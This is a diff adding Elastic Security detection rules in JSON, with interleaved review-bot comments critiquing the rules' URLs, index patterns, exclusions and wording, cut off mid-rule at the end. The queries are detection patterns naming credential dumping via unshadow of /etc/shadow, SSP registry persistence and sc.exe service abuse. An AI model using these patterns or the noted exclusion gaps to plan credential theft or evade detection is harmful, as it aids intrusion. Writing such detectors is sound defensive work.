@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of the unshadow utility which is part of John the Ripper, a password-cracking tool on the host machine. Malicious actors can use the utility to retrieve the combined contents of the '/etc/shadow' and '/etc/password' files. Using the combined file generated from the utility, the malicious threat actors can use them as input for password-cracking utilities or prepare themselves for future operations by gathering credential information of the victim.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Linux Credential Dumping via Unshadow", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and\nprocess.name == \"unshadow\" and process.args_count >= 3\n", + "references": [ + "https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e7cb3cfd-aaa3-4d7b-af18-23b89955062c", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.008", + "name": "/etc/passwd and /etc/shadow", + "reference": "https://attack.mitre.org/techniques/T1003/008/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 8 + }, + "id": "e7cb3cfd-aaa3-4d7b-af18-23b89955062c_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_206.json b/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_206.json new file mode 100644 index 00000000000..8df99cac0fe --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_206.json 
@@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies when an AWS Route Table has been modified or deleted.", + "false_positives": [ + "Route Table could be modified or deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Route Table being modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. Also automated processes that use Terraform may lead to false positives." + ], + "from": "now-60m", + "index": [ + "filebeat-*", + "logs-aws*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "name": "AWS Route Table Modified or Deleted", + "note": "", + "query": "event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.action:(ReplaceRoute or ReplaceRouteTableAssociation or\nDeleteRouteTable or DeleteRoute or DisassociateRouteTable) and event.outcome:success\n", + "references": [ + "https://github.com/easttimor/aws-incident-response#network-routing", + "https://docs.datadoghq.com/security_platform/default_rules/aws-ec2-route-table-modified/", + "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ReplaceRoute.html", + "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ReplaceRouteTableAssociation", + "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DeleteRouteTable.html", + "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DeleteRoute.html", + "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisassociateRouteTable.html" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + 
"type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "e7cd5982-17c8-4959-874c-633acde7d426", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Use Case: Network Security Monitoring", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "e7cd5982-17c8-4959-874c-633acde7d426_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_108.json b/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_108.json new file mode 100644 index 00000000000..40ea2ff322e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_108.json 
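Review bot: The fourth `references` entry, `https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ReplaceRouteTableAssociation`, is the only AWS API link in the list without the `.html` suffix its siblings carry, so it looks like a truncated URL; it should presumably read `https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ReplaceRouteTableAssociation.html`. The `threat` block maps the rule to Persistence (TA0003) with an empty `technique` list, so the alert carries a tactic but no technique for analysts to pivot on, and `note` is the empty string, so there is nowhere explaining why; a one-line `note` stating that no ATT&CK technique currently fits route-table tampering would make the empty mapping deliberate rather than look like an omission.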
@@ -0,0 +1,179 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies Service Control (sc.exe) spawning from script interpreter processes to create, modify, or start services. This can potentially indicate an attempt to elevate privileges or maintain persistence.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "logs-system.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Service Control Spawned via Script Interpreter", + "note": "## Triage and analysis\n\n### Investigating Service Control Spawned via Script Interpreter\n\nWindows services are background processes that run with SYSTEM privileges and provide specific functionality or support to other applications and system components.\n\nThe `sc.exe` command line utility is used to manage and control Windows services on a local or remote computer. Attackers may use `sc.exe` to create, modify, and start services to elevate their privileges from administrator to SYSTEM.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the command line, registry changes events, and Windows events related to service activities (for example, 4697 and/or 7045) for suspicious characteristics.\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the 
environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is not inherently malicious if it occurs in isolation. As long as the analyst did not identify suspicious activity related to the user, host, and service, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "/* This rule is not compatible with Sysmon due to user.id issues */\n\nprocess where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"sc.exe\" or process.pe.original_file_name == \"sc.exe\") and\n process.parent.name : (\"cmd.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\",\n \"wmic.exe\", \"mshta.exe\",\"powershell.exe\", \"pwsh.exe\") and\n process.args:(\"config\", \"create\", \"start\", \"delete\", \"stop\", \"pause\") and\n /* exclude SYSTEM SID - look for service creations by non-SYSTEM user */\n not user.id : \"S-1-5-18\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": 
"^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "e8571d5f-bea1-46c2-9f56-998de2d3ed95", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + }, + { + "id": "T1059.005", + 
"name": "Visual Basic", + "reference": "https://attack.mitre.org/techniques/T1059/005/" + } + ] + }, + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.010", + "name": "Regsvr32", + "reference": "https://attack.mitre.org/techniques/T1218/010/" + }, + { + "id": "T1218.011", + "name": "Rundll32", + "reference": "https://attack.mitre.org/techniques/T1218/011/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "e8571d5f-bea1-46c2-9f56-998de2d3ed95_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_107.json b/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_107.json new file mode 100644 index 00000000000..1d1fd107848 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_107.json 
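Review bot: The query opens with `/* This rule is not compatible with Sysmon due to user.id issues */`, yet the `index` list includes `logs-windows.*`, which also matches the `logs-windows.sysmon_operational-*` data stream that the other rules in this commit target explicitly, so Sysmon events are still fed to this rule. On those events the final `not user.id : "S-1-5-18"` filter evaluates against whatever `user.id` Sysmon does or does not populate, so the SYSTEM exclusion the comment depends on may either never apply or suppress everything, and neither outcome is visible to the operator. Either narrow `logs-windows.*` to the non-Sysmon windows data streams, or state in a `note`/`setup` section (this rule has neither) that Sysmon-sourced events must be excluded at the index level; the absence of a `Data Source: Sysmon` tag is consistent with the comment but not with the index pattern.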
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies registry modifications related to the Windows Security Support Provider (SSP) configuration. Adversaries may abuse this to establish persistence in an environment.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Installation of Security Support Provider", + "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\Security Packages*\",\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\Security Packages*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages*\"\n ) and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\", \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e86da94d-e54b-4fb5-b96c-cecff87e8787", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - 
https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.005", + "name": "Security Support Provider", + "reference": "https://attack.mitre.org/techniques/T1547/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "e86da94d-e54b-4fb5-b96c-cecff87e8787_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_108.json b/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_108.json new file mode 100644 index 00000000000..d7b9f6ddd0d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_108.json 
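Review bot: The exclusion `not process.executable : ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")` is path-only and unconditional, so any write to the `Lsa\Security Packages` values that goes through the Windows Installer is dropped regardless of whether the package is signed or trusted, which is a documented-nowhere gap for a rule whose whole purpose is catching SSP registration. If the intent is to cut installer noise, consider qualifying the exclusion with `process.code_signature.trusted == true` so an unsigned installer path is not a free pass, or at minimum record the gap in a `note` (this rule has none). The same exclusion appears unchanged in the version 108 hunk for `e86da94d-e54b-4fb5-b96c-cecff87e8787_108.json`, which differs from this one only in the `logs-endpoint.events.registry-*` index pattern.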
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies registry modifications related to the Windows Security Support Provider (SSP) configuration. Adversaries may abuse this to establish persistence in an environment.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Installation of Security Support Provider", + "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\Security Packages*\",\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\Security Packages*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages*\"\n ) and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\", \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e86da94d-e54b-4fb5-b96c-cecff87e8787", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - 
https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.005", + "name": "Security Support Provider", + "reference": "https://attack.mitre.org/techniques/T1547/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "e86da94d-e54b-4fb5-b96c-cecff87e8787_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_6.json b/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_6.json new file mode 100644 index 00000000000..fadff4f662e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_6.json 
@@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects files creation and modification on the host system from the the Windows Subsystem for Linux. Adversaries may enable and use WSL for Linux to avoid detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Host Files System Changes via Windows Subsystem for Linux", + "query": "sequence by process.entity_id with maxspan=5m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"dllhost.exe\" and \n /* Plan9FileSystem CLSID - WSL Host File System Worker */\n process.command_line : \"*{DFB65C4C-B34F-435D-AFE9-A86218684AA8}*\"]\n [file where host.os.type == \"windows\" and process.name : \"dllhost.exe\" and not file.path : \"?:\\\\Users\\\\*\\\\Downloads\\\\*\"]\n", + "references": [ + "https://github.com/microsoft/WSL" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e88d1fe9-b2f4-48d4-bace-a026dc745d4b", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + 
"name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1202", + "name": "Indirect Command Execution", + "reference": "https://attack.mitre.org/techniques/T1202/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "e88d1fe9-b2f4-48d4-bace-a026dc745d4b_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_105.json b/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_105.json new file mode 100644 index 00000000000..a2d689b4ab9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_105.json 
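Review bot: The description reads "from the the Windows Subsystem for Linux" (doubled "the"); it should be `from the Windows Subsystem for Linux`. The description also promises "files creation and modification", but the second sequence clause `[file where host.os.type == "windows" and process.name : "dllhost.exe" and not file.path : "?:\\Users\\*\\Downloads\\*"]` carries no `event.type` restriction, so presumably any file event kind the data source emits for that process (deletions included) completes the sequence; either add `event.type : ("creation", "change")` to match the description or widen the description so triage expectations match what fires. The rule `name`, "Host Files System Changes", likely also wants "Host File System Changes".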
@@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of several commonly used system commands executed by a previously unknown executable located in commonly abused directories. An alert from this rule can indicate the presence of potentially malicious activity, such as the execution of unauthorized or suspicious processes attempting to run malicious code. Detecting and investigating such behavior can help identify and mitigate potential security threats, protecting the system and its data from potential compromise.", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious System Commands Executed by Previously Unknown Executable", + "new_terms_fields": [ + "host.id", + "user.id", + "process.executable" + ], + "query": "host.os.type:linux and event.category:process and event.action:(exec or exec_event or fork or fork_event) and \nprocess.executable:(\n /bin/* or /usr/bin/* or /usr/share/* or /tmp/* or /var/tmp/* or /dev/shm/* or\n /etc/init.d/* or /etc/rc*.d/* or /etc/crontab or /etc/cron.*/* or /etc/update-motd.d/* or \n /usr/lib/update-notifier/* or /home/*/.* or /boot/* or /srv/* or /run/*) \n and process.args:(whoami or id or hostname or uptime or top or ifconfig or netstat or route or ps or pwd or ls) and \n not process.name:(sudo or which or whoami or id or hostname or uptime or top or netstat or ps or pwd or ls or apt or \n dpkg or yum or rpm or dnf or dockerd or docker or snapd or snap) and\n not process.parent.executable:(/bin/* or /usr/bin/* or /run/k3s/* or /etc/network/* or /opt/Elastic/*)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + 
{ + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "e9001ee6-2d00-4d2f-849e-b8b1fb05234c", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
